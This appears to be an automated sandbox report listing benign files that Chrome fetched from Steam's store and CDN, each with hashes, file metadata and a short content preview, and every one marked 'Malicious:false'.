        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[7975],{44965:e=>{e.exports=JSON.parse('{"language":"english","Steam_Platform":"Steam","Button_About":"About","Button_Append":"Append","Button_Back":"Back","Button_Cancel":"Cancel","Button_Close":"Close","Button_Clone":"Clone","Button_Confirm":"Confirm","Button_Copy":"Copy","Button_Copied":"Copied","Button_CopyClipboard":"Copy to Clipboard","Button_CopyLink":"Copy Link","Button_Continue":"Continue","Button_Create":"Create","Button_Delete":"Delete","Button_Discuss":"Discuss","Button_Dismiss":"Dismiss","Button_Edit":"Edit","Button_Learn":"Learn more here","Button_Publish":"Publish","Button_Post":"Post","Button_OK":"OK","Button_Done":"Done","Button_Overwrite":"Overwrite","Button_Retry":"Retry","Button_Remove":"Remove","Button_Revert":"Revert","Button_Save":
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (5130), with CRLF line terminators
        Category:downloaded
        Size (bytes):5277
        Entropy (8bit):5.008159446140012
        Encrypted:false
        SSDEEP:48:v9UCW5YM5s2oiQPLbclzd8h2pWohNXaVGebQHjXVbeRhDIi2sm/p/5CdYPIjUolC:vnW5Ymmclzuh2plNXatbI2Ey+oar
        MD5:8737F5EDF116250C2D86C9D49FFBD893
        SHA1:528DC146864A4CAD1B3F1CEE3C547CC6DD327B27
        SHA-256:7DB2C72F74D8A2036437C0D2DF923F54CF825793C94E4701CEC43596481F83AA
        SHA-512:A4108243C84EA3FA65278A009B4392F8D1C1BCA63D26F605296CE0AE51BAE6813194506C109331C3D5070BDECF0118A18748E86608463A3EC3951A6E6C1B8980
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/flot-0.8/jquery.flot.selection.min.js?v=._7pxnS3SCqO7&_cdn=cloudflare
        Preview:/* Javascript plotting library for jQuery, version 0.8.3.....Copyright (c) 2007-2014 IOLA and Ole Laursen...Licensed under the MIT license.....*/..(function($){function init(plot){var selection={first:{x:-1,y:-1},second:{x:-1,y:-1},show:false,active:false};var savedhandlers={};var mouseUpHandler=null;function onMouseMove(e){if(selection.active){updateSelection(e);plot.getPlaceholder().trigger("plotselecting",[getSelection()])}}function onMouseDown(e){if(e.which!=1)return;document.body.focus();if(document.onselectstart!==undefined&&savedhandlers.onselectstart==null){savedhandlers.onselectstart=document.onselectstart;document.onselectstart=function(){return false}}if(document.ondrag!==undefined&&savedhandlers.ondrag==null){savedhandlers.ondrag=document.ondrag;document.ondrag=function(){return false}}setSelectionPos(selection.first,e);selection.active=true;mouseUpHandler=function(e){onMouseUp(e)};$(document).one("mouseup",mouseUpHandler)}function onMouseUp(e){mouseUpHandler=null;if(docume
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):136665
        Entropy (8bit):5.309075995831851
        Encrypted:false
        SSDEEP:1536:bZuIBobvWn/B3xfemTMnPKE8wt/1YJO0MMxZTEZ5jpYwr0svwWVjg9WN:bNYnPKE89AfMwZ5jWs0svwWVjg9u
        MD5:EDBD9E8B595A18EAAE835662B0EEAD1C
        SHA1:23405F4265A71B15EEDCDA4C95FE22F77374AC1D
        SHA-256:F24B9397B3AFBFA8240C56890731E2F61573CF85DE11EC763C149C6230AA37CD
        SHA-512:D1772AAFFA5B963834ACC42224F1523E322BFDDE7A2876A973C63D99B195E033D24005D69D9AAF669D82981EB0D5257CAA67F44480F561823991B23A43B0AAF8
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/v6/store.css?v=7b2ei1laGOqu&l=english
        Preview:..* {...padding: 0;...margin: 0;..}....img {...border: none;..}......a {...text-decoration: none;...color: #ffffff;..}.......a:focus {...outline: 0px none;..}....a:hover {...text-decoration: none;.. color: #66c0f4;..}....a.nohover:hover {...text-decoration: none;..}......html {...height: 100%;..}....body.v6 {...position: relative;...min-height: 100%;...font-family: Arial, Helvetica, sans-serif;...color: #c6d4df;...font-size: 12px;..}....body.v6.in_client {...background-position: center top;..}....body.v6.game_bg {.. background: #1b2838;..}....body.v6 > div#global_header {...border-bottom-color: #171a21;..}.....v6_bg {.../* background: url( '/public/images/v6/tag_browse_header_bg.png' ) no-repeat center top; */..}....body.blue .v6_bg {...background:....url( '/public/images/v6/blue_top_center.png' ) center top no-repeat,....url( '/public/images/v6/blue_top_repeat.png' ) center top repeat-x..;.....min-height: 370px;..}....body.v6 div#store_header {...background-color: transparent;..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):81169
        Entropy (8bit):7.978776274967163
        Encrypted:false
        SSDEEP:1536:ab1gV9JR3AQSRvC/j/YDF+BiREVriUyOiYI1aqk/XCBJvhw4yi:ahW9J2Qmoj/YcBSEVriUyHvBxyi
        MD5:70191EA54BC5F7B92E8D4F8B86B21D0A
        SHA1:B6577694CD94F95DC6EC7EFE6A6D588E8B3DCBAC
        SHA-256:2FB86A62E78258A7BF5B43B96D08C4E7F0C139EE403CFD2194610679A5C21C2A
        SHA-512:15172831895406087F858E8B195014483CB1D85A95FAFD80BC758F62E6D5C963FB8201FC8CE5E3DB5ABC677F0FA25927F9D37573116748903BE7BF0CD1D15793
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R..........................!1..AQa.."2q.B...#R...3r..$45Cb.s.....Sc...7Dt...&6...................................=........................!1A.."Q.2aqB....#R..3...$C.4.5SbDr.............?..,..1(.o.c..........Y........pg.d.p3m.....G.Qq<.9....F..N.tf.......&IFF.......1.> ..5........}..e.C.-.i..I0...B.........VP.N.`.......s....RB.y.t5.&.$..9..J..cQ.../.t.).......#G..Fj3......B..|A...1..[*l....P...co.....q.......|.py;c.{>.p.3tK.E.....G.U.(E...;28.}M..Z...4]y%......4.#m,.s...0..gv~gv..Oi.Rd@.Z..0....|ED.hw.p.p...)\.L...f......!wI.)..R..[.d.Y.....9...V..\..e..ii..nW.7......x.#.=q,.&....\m.rii.|....g.3.5J..p.b.(..R.e.I....Y,.nQ.l..y..J.m*...<.-.P,91.j.l"..v..8....lu.....@..2.O....^}1u......oj.h...L.l..viM....U.)...C[. .'N}2.Ds..9.....;..?:..n..iv.Q!.\.....){
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):229
        Entropy (8bit):5.208866791114413
        Encrypted:false
        SSDEEP:6:GXO23whT+t1FQuXX6C8Vo+nViARCa3whT+tAeEM:AO2gst1W1C8VRnEARhgstAeEM
        MD5:5903FB1A517865DCA5A7D37D419249A5
        SHA1:BBD2053A90BB34CC1EA6E4A9BB96A7FE710308A6
        SHA-256:1C59C22822333FD3E2CD5CEF13C3E90D9998493438888D11B23E6A6B9EEFADD1
        SHA-512:28022995614CB23E8463FCF85FC829BAA3F9D9330BBCCA7169B1501194374B806CE9C06E5ED8E1A76799BF1680D01773ECA74F4FC2554029167140A816E67B9F
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/applications/store/login.css?contenthash=31a1587a28aa962de04a
        Preview:............_2kLRmRsLwjGDlm-ZfUpChG{padding-top:80px;padding-bottom:150px;display:flex;flex-direction:column;align-items:center}@media screen and (max-width: 700px){._2kLRmRsLwjGDlm-ZfUpChG{padding-top:12px;padding-bottom:0px}}..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 306x350, components 3
        Category:dropped
        Size (bytes):175847
        Entropy (8bit):7.975914005925516
        Encrypted:false
        SSDEEP:3072:47jmQ3UOnl9XiR8pNFg/i+RfCRc5tRmooI8mlOBaXOmUuw3WjSKV0hQBcJrD2MVk:AmQEkXiR8wMc53zjXRe3LqF4rDxV0FPJ
        MD5:BD6E8B82C3E6C18507EB3ECF041E4D8E
        SHA1:425C630ECC943D0DD9105A7FD1800E31D40CEF0F
        SHA-256:C214EF90D880175CDF66EBCD9421643DB2C35B6E0D95235AE579D3E8A05E3E40
        SHA-512:6E63BB89EFF02B578939A8025A1D3270A580BDAF3D9B3BFF203EC4BDAF5FB3F37791576C61C53178E7095F93D6959753EFE566027364FB2C050A9EDBA647A60D
        Malicious:false
        Reputation:low
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:downloaded
        Size (bytes):44
        Entropy (8bit):4.544325652580697
        Encrypted:false
        SSDEEP:3:hWikj2hkum0KthOU1:AikjDBr
        MD5:6D93FDB56B417B26D61378095110EA11
        SHA1:99C638B5D3CBB852EF664EFC7A1E8282F3997DE9
        SHA-256:D8F0F15132104CAEF0BADCF8657B9CFCC4237F59AC844DE47E297A2F48E43AD9
        SHA-512:6A735A16B22DC3152CB359D47C9E51B1117EA624B573F24B4694734F2F90CBFE7ECF5D3684DBCF9CB08FEC7873C5399AAF58C0174A5B60ED93E3D48F971ADF34
        Malicious:false
        Reputation:low
        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwn2ZtV5zmIo5BIFDYPOwY0SBQ2S9RIrEhAJ48ci2S48zdQSBQ38LUur?alt=proto
        Preview:ChIKBw2DzsGNGgAKBw2S9RIrGgAKCQoHDfwtS6saAA==
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6981
        Entropy (8bit):7.933061170224312
        Encrypted:false
        SSDEEP:192:Dt8oIaxdb5adX9CZmVdJpcIqTMLVbETcDd:Dt8GdYdYw/LVggd
        MD5:DC6332D1EA8F9E84778262F6525E2398
        SHA1:C0BE541B027EDA558351FAB9A70B2160F2494D59
        SHA-256:4B161A4B07418F259A8ECB46C19BA28CA28CBB39EBD328AFB98A3F28A385CA3C
        SHA-512:66AEFA32B85226068BCE2F9509C51E9F1DB2702A12836541ACE3B50F4579CB1790781C5FEF432CA5CE170D4F375322CFFC347A4757B89CD4F755ED39F4C3297F
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................9............................!1.A."Qa...2q#BR..$3b.%Cr..................................9......................!..1AQaq......."2....BRbr....#$3.............?....[.]....iw.n.... }..\V1.]....).........T.%d.6I'.r;a...c...1..$sH.MDc#W..)..Q.bS.5.G!.u.F....Q....(Q......}Q.......t...R.S.$+.L.,..b.. ...3....26..s...._...!.@mG?*....tE.CJx.JH..$v... ..\...4.D....{i....,!H.;j.*..$...E8..,.[\3.02..E..3uJ....A.U.SYL%Ei(*e`....?..q.N.bK.z..D.....S\AF.e....F...L..MP..Q.'......$..tF...j(4F..Q.kdgA....w\?....D.Rc.Ly.2..L....9.%.!(q..)_,..u.{W.{.n../......H..m...f...V#!.}W..yQ......v.jRg..[.K~.P.S...s.{..`..7.....r..q....5v.....ftToS;.j..BE.`[.]a%L.a.N....J.`.J.1.!9.......8.Ha]E..Zf6..N...t_..#.?..4..X.r.....si.....&.....~\5...p.q...iX)...d..^...v.aE(`.&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 320 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):6719
        Entropy (8bit):7.901529029287266
        Encrypted:false
        SSDEEP:192:5hA6M4WnkyWwqmnHAXF50kzSvF3eIoAOpyj:5yvnkyTnhv8AOgj
        MD5:49B920CA1495FC302A0ED1515CE53491
        SHA1:6CCE254202C4DC378CF31AAA7D05C8538267F078
        SHA-256:472165755644972C17E4BBAF1300926AB99724D95599415B2EA7F9C16A27737C
        SHA-512:F25A18A9433F4CAF2106D2D95CC4CB58C053395AE7341EEF0CD143134F10A00C6AFE7301B0EC58D57705641B42F1375D9BA8491C823DAB804D48AA8B75F4AAB8
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/buttons/icons_16.png?v=5
        Preview:.PNG........IHDR...@... .....c..D....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8C87CFB10319E411A236C2B21919E765" xmpMM:DocumentID="xmp.did:9BC4BE959C4B11E4A75E88529746DCED" xmpMM:InstanceID="xmp.iid:9BC4BE949C4B11E4A75E88529746DCED" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4328D7F2BF9AE41194B9DA16F2E1AD04" stRef:documentID="xmp.did:8C87CFB10319E411A236C2B21919E765"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.p.....oIDATx..]....~=........:.1..$...*...BP....G
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC 2014 (Windows), datetime=2016:11:15 17:43:02], baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):276785
        Entropy (8bit):5.568012347483792
        Encrypted:false
        SSDEEP:3072:4c+ENgXaPpAf9Y9kmmuxOlS8r5SvYdabDVqL+eAXfB/:9NgX6W1okCwMAaBvZ
        MD5:B4F887D5C551454E6885651CF8AE747A
        SHA1:416C4E64AA4DAE6D90D5A8F8A37BAD1CBD437C4C
        SHA-256:E73CB3547953369B5A29AE3F850B68C84DD36D41B5AB59F6269761C16A2E2E04
        SHA-512:8D40F47C2DF7F5E90743FD291839DB2D8FB67778B7AB2441997A9935A58171E7D4C3F941483DE3D08EDDA3C543114C1C3AB920209E60A135E2F0FC26E9F60166
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H....(.Photoshop 3.0.8BIM.......7..Z...%G..Z...%G..Z...%G..Z...%G..Z...%G..Z...%G........8BIM.%.......z....$.".hP.pt8BIM.:....................printOutput........PstSbool.....Inteenum....Inte....Clrm....printSixteenBitbool.....printerNameTEXT...Z.\.\.p.q.-.h.p.m.4.5.1.d.n.-.3.0.6.-.m.a.r.k.e.t.i.n.g...p.r.n...c.o.r.p...f.r.o.n.t.i.e.r...c.o...u.k.\.U.n.i.t. .3.0.6. .M.a.r.k.e.t.i.n.g. .H.P. .L.a.s.e.r.J.e.t. .M.4.5.1.D.N......printProofSetupObjc.....P.r.o.o.f. .S.e.t.u.p......proofSetup........Bltnenum....builtinProof....proofCMYK.8BIM.;.....-..............printOutputOptions........Cptnbool.....Clbrbool.....RgsMbool.....CrnCbool.....CntCbool.....Lblsbool.....Ngtvbool.....EmlDbool.....Intrbool.....BckgObjc..........RGBC........Rd doub@o..........Grn doub@o..........Bl doub@o..........BrdTUntF#Rlt............Bld UntF#Rlt............RsltUntF#Pxl@R..........vectorDatabool.....PgPsenum....PgPs....PgPC....LeftUntF#Rlt............Top UntF#Rlt............Scl UntF#Prc@Y......
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 22 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansRegular4.015;Plau;Motiva
        Category:downloaded
        Size (bytes):122684
        Entropy (8bit):6.0666961682037535
        Encrypted:false
        SSDEEP:3072:lpsQ7l3T64Z1lKcDqttEPBWVNwZ+e222pKKSxfj9:Yg3T64Z19DqtkWbu/222kZfh
        MD5:57613E143FF3DAE10F282E84A066DE28
        SHA1:88756CC8C6DB645B5F20AA17B14FEEFB4411C25F
        SHA-256:19B8DB163BCC51732457EFA40911B4A422F297FF3CD566467D87EAB93CEF0C14
        SHA-512:94F045E71B9276944609CA69FC4B8704E4447F9B0FC2B80789CC012235895C50EF9ECB781A3ED901A0C989BED26CAA37D4D4A9BAFFCCE2CB19606DBB16A17176
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015
        Preview:........... DSIG.......4....GDEF...4...,...@GPOS:>}....l..uzGSUB.d....v.....OS/2u6.........`cmap.d..........cvt F......|....fpgm.6!....D....gasp.......t....glyf._m....|....head...H...l...6hhea...G.......$hmtx..l.........locaCH..........maxp.......X... name..l...x...opost............prep.......\...................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 1438x810, components 3
        Category:dropped
        Size (bytes):31638
        Entropy (8bit):7.264346956363237
        Encrypted:false
        SSDEEP:384:6cqLF4ljYRJkqjOKHVGAw/y8ls0wpvv5XJ+aHjcsXch8a0djz1KtuUtcWjHeiyE:jqpUYkqSGVUyZb+aH3sOWHe+
        MD5:F286FFA4559E87B39F747032C70DBA79
        SHA1:502B3D0EDC60B0D528409C1C52C3EB178EB12D7C
        SHA-256:E2D02DA2C7CF431C33899F510D143EAB7FED32A357BDB0D7C2D8495B7069BD7A
        SHA-512:206AEC3EA0EA60A1F0F8C56AE52CB6968EA711A53EE7DD19A506F89AE0EAF508817545BE7D19757D66AD355F0D4B63909413F48F6414AD9DA5527CCFAB680694
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................*..........................................)......................!1AQaq........."R.................................................1!AaqQ............?..=.r.{..U.++...S.Q.R...%i.V{.........F.hJ.e..J...j*U.`....Yh.........`...O..m. .....7...........o....-.v...o..6.m.....'+..5.....v.`v.......... e.P@X..O....*.D.......$...5p....%......m.6...........U....UT.USo...@........h..E...S.......X......O.@.....=..O...P....._.........S................. ....@../..Pg.....*..4.......d..0D.QY.d@0...A(.......5...S..1(..(%...g.h..++.J.-.M.....#5ZE.V.....c5.*...Pe..V...Z.eg.A..C.B.D..".T.x...P...............E....4..`....,....._@..........*............j...%....&..S.....PEU....By..?....g.....(*..A....`*.............~...~...@...|.(.............S..TED..P@OB...E@K.A0.TA=...A..*5.....h..*,dQ.. ...F..dE....5...@.J3H".P@...`..Q...%Q.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):90637
        Entropy (8bit):7.974951631570269
        Encrypted:false
        SSDEEP:1536:3GSOh65hm5bkmcKbabEQT1g2pMdbJwWq0CkMMwjky/J+vpj8a0Ge1SMD0ASZfSpT:3GGmWbDTWn1JwWpCmwoy/cZjMDFzrp
        MD5:813E363A0FE0257DC6FA058A8FFEFB9B
        SHA1:7981CC8C110B8784224DE5AD8236C4647C17DF41
        SHA-256:E549FBF811D11A50BEC7389C75979C826B97BA4A88E1F8EE92F572AC327A41FB
        SHA-512:E09137824CE896C671B4261551B8CD2A25730F9DD84315AACCBC54BA5DBABD2F1B614BDFEF290B2C64A73690ED14857AD9A939A2E20E4988D04ABEEC647B7654
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................U.........................!.1..AQ."a.2q...#B.R...$3456brs....7tu....CS....8v.DE......................................@.......................!.1.AQa."q.2.....B....#..3R$4br..5C.D..............?..[.-:".SxzD..N..B.Z:.h.3.|....c.."...uY.YH.@.8..H..:...]]...e.|.P7.....:........H..Z:X.G...(.I.{..Z.P.k.!.d....!..-..T.Et.@x[........m..'.,+.L6.].V.@9......qn!aF..8..-.pF.....j...-.t.]G.v.......=.ZM..P.>_..U+.q..?R....w...'.#.0...l...?..v..{\V.}.I3O)..#2.~.......{>9Z..X6..*..9.G...p. ..l.\.6..r..9...%@....Ix.G......-N.L._....0N.#......r.........0.9...1......TdTnF.........t.....Ak.y..D..X.,2NZ=....}w...'XS.../qh......A..r+.....}6...eJ.........i!.bH.H.c.3.A6V.K|1.A.%........a....G.Y.Y..i.8.1.P8.I.I...#...&..q.k..$..B...8..989.......WM.q...N...Ttu(L2UC.4.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):38538
        Entropy (8bit):7.974154189712044
        Encrypted:false
        SSDEEP:768:JSAeyUJKGKD9aW1anoJnQXjBErr5U+d9uqLT1NBiQ0j5bT:kAeyUJKGyaW1aUQXtEh9uKLYQ05bT
        MD5:9E71331B2B35139126F2468F40D738C0
        SHA1:9CE18D3CEFC6AB81C5BB54207E9828A64DA70B67
        SHA-256:6D51F18F00AD2CA2E64BA875C45CD976D4C1E2402B24DAF85B1597EFB94DB4EA
        SHA-512:C50CA94BF02A1415FC8ED0C715D317BDB753EB95FD79CBD2E62200EC1DEB9EEDDB82D37D3A230180679B7F2238379857012E7E4A954481607D3C2A5667DC2BAC
        Malicious:false
        Reputation:low
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................K........................!..1A."Qa.2q....#BR....3br..$C.......4Sc..%D5Ts..................................5.......................!1.A.Qa."2q.......#BR...3.$r............?....RI..Gle.yH...-.._.QDf...s.O...........5\..A.?..c.P6.T.......@.W .$g.Ms.....s.{.E.P...S@.*@....s.......9...zS....2.....@.W.nv.tO...X.t...<.c..0.v..@...0O.5|.Q........@.|...@...:Ug......}MH.....#E......Q........%b....I_....q..oL{S#A..=(.&.].M,..;T.}.......`.:G..I.EI3..!. ...(.1....c.L.......5..?......5..G.b.J:..Ph...t.;..EW...b..9.t.\......%..+....zF)..f....d..+Q.lRi(8.......L$.. ........z2I.IE/Pw...w..Hmd.,....^.1.&(.(;.Q^..*&....z..g8...........,Fz..qL..U....j...L.@.G._ ..J.P*.....C.>...x..D...?4M..-..U.w...IS#..4~+..bQ.....=.2.3....q....]..lZ'.\..c$=.c.........'..@.n....[j.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (32033), with CRLF line terminators
        Category:downloaded
        Size (bytes):52973
        Entropy (8bit):5.2652869361264445
        Encrypted:false
        SSDEEP:768:JGKwOx6qLsBQLd4OEe5+luXCOZhpH6+FYFsWMFlg7:k+6qLQQV5DpH63p
        MD5:20FFB5E660CD7B16A8C94724492719DD
        SHA1:F9B8815EDAE02C293B413579C3B30C3375362B7E
        SHA-256:E26964E93604992BEDA3DC0CFADB62843B7E846C11BAAF1DA45652FEAF849021
        SHA-512:ADE4879518CEE84ED906F60DEAD122EFCF14A2B0E9CC33786E9C11D2D766B9C612E304967AE370A6676B5A6652813209A868CA37BFBC9F6E398CA18EB54952A0
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/flot-0.8/jquery.flot.min.js?v=.-m414tR-pxn_&_cdn=cloudflare
        Preview:/* Javascript plotting library for jQuery, version 0.8.3.....Copyright (c) 2007-2014 IOLA and Ole Laursen...Licensed under the MIT license.....*/..(function($){$.color={};$.color.make=function(r,g,b,a){var o={};o.r=r||0;o.g=g||0;o.b=b||0;o.a=a!=null?a:1;o.add=function(c,d){for(var i=0;i<c.length;++i)o[c.charAt(i)]+=d;return o.normalize()};o.scale=function(c,f){for(var i=0;i<c.length;++i)o[c.charAt(i)]*=f;return o.normalize()};o.toString=function(){if(o.a>=1){return"rgb("+[o.r,o.g,o.b].join(",")+")"}else{return"rgba("+[o.r,o.g,o.b,o.a].join(",")+")"}};o.normalize=function(){function clamp(min,value,max){return value<min?min:value>max?max:value}o.r=clamp(0,parseInt(o.r),255);o.g=clamp(0,parseInt(o.g),255);o.b=clamp(0,parseInt(o.b),255);o.a=clamp(0,o.a,1);return o};o.clone=function(){return $.color.make(o.r,o.b,o.g,o.a)};return o.normalize()};$.color.extract=function(elem,css){var c;do{c=elem.css(css).toLowerCase();if(c!=""&&c!="transparent")break;elem=elem.parent()}while(elem.length&&!$.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):106215
        Entropy (8bit):7.975564817576758
        Encrypted:false
        SSDEEP:3072:ZCokiPuGPLhO+GLJztDrLLVvKJy+srYT78vMvi:ZjFuGk+KJpDr390ydrc78vM6
        MD5:6D414F5F0205CDF6A6510116526B34F9
        SHA1:0DBD93EA617D129C1AB2D0B3A5EE5D437E6B933B
        SHA-256:1797E38037BA9EBEE748D5B93703F3663D31BCDA85568A2009E4BCEB5E280ABF
        SHA-512:C0B7BB3A2C44E534CF04BC5F4683DFED336CC4BFE4D615F891127A9DB19B165A367A73AED555B1CD411296E52C7F7A3FFE1F352747EEAA641B5AB525D6AA15D6
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/ss_c3ad41519739ab629d33a5945829400335750a5d.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................U.........................!.1.."AQa..2q..#B..R....$3br..6s..45t......7CS.8cv...%Du..................................;......................!..1A."Qaq.2.........#.3B4R.Cbr.$..............?.....d$........<d.=...V.'t..H.2X...$.,.T.4L.Y...bq...+....^.EG.1F...9.=...WD.%...N.s....U+.!4m..)$.|......,y&x.9?.....k.E..R0c...?]XD..8.].W._..m.aUx-..l.<....2.X.N.....".[.[..|.J YC.).h*...&T.....~.q.........z....g(vDyy.,..y?............re..uoA? ._:....+...[.. ..Jzy<..%....v.....=..#...sz;...E......)(...q..~...~Y.......U.o9I....4.-|3....A....J.p9.q.j2... ....$..........0%YU...$g..VX.l.Y..-_.fw.d....{......._~...S5.=..qia.5..&.h...8....Np5...>..X&g.....$.!f~6.....<...Gb.H.5..Q..T..oL.w.A$...?............k..-L.TM..P..T.v......1.s....%..3n...Yn..)/.9`..y...#.........M'....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:downloaded
        Size (bytes):35997
        Entropy (8bit):5.371574127408257
        Encrypted:false
        SSDEEP:768:yUoGl3RaxmiXvDS94VRO/rltQUGGaJ39apaRv+aw+0T0aMWdau:DCmiXvDS94VROMlGwIWv+K0T0KdB
        MD5:4A0D7B0E1D7E7C5AF1A27BED13F062D3
        SHA1:D445B683A22C817E4053EE52F967CE7AEC59E288
        SHA-256:8F3940C7E84F1E50C4D871349E46CE1D9005F3A62E4D4B1C5A9B0ABEE8300AD8
        SHA-512:D5A3883ED478CCE9C5BEDC22571E3D23355B4D80C528DFFE48CF5D3CB7656091DBE669CF421FEE6A4929C2CD7DF59F45E215AFE88FEE74DD0FB40A8686C69E9B
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/gamehighlightplayer.js?v=Sg17Dh1-fFrx&l=russian&_cdn=cloudflare
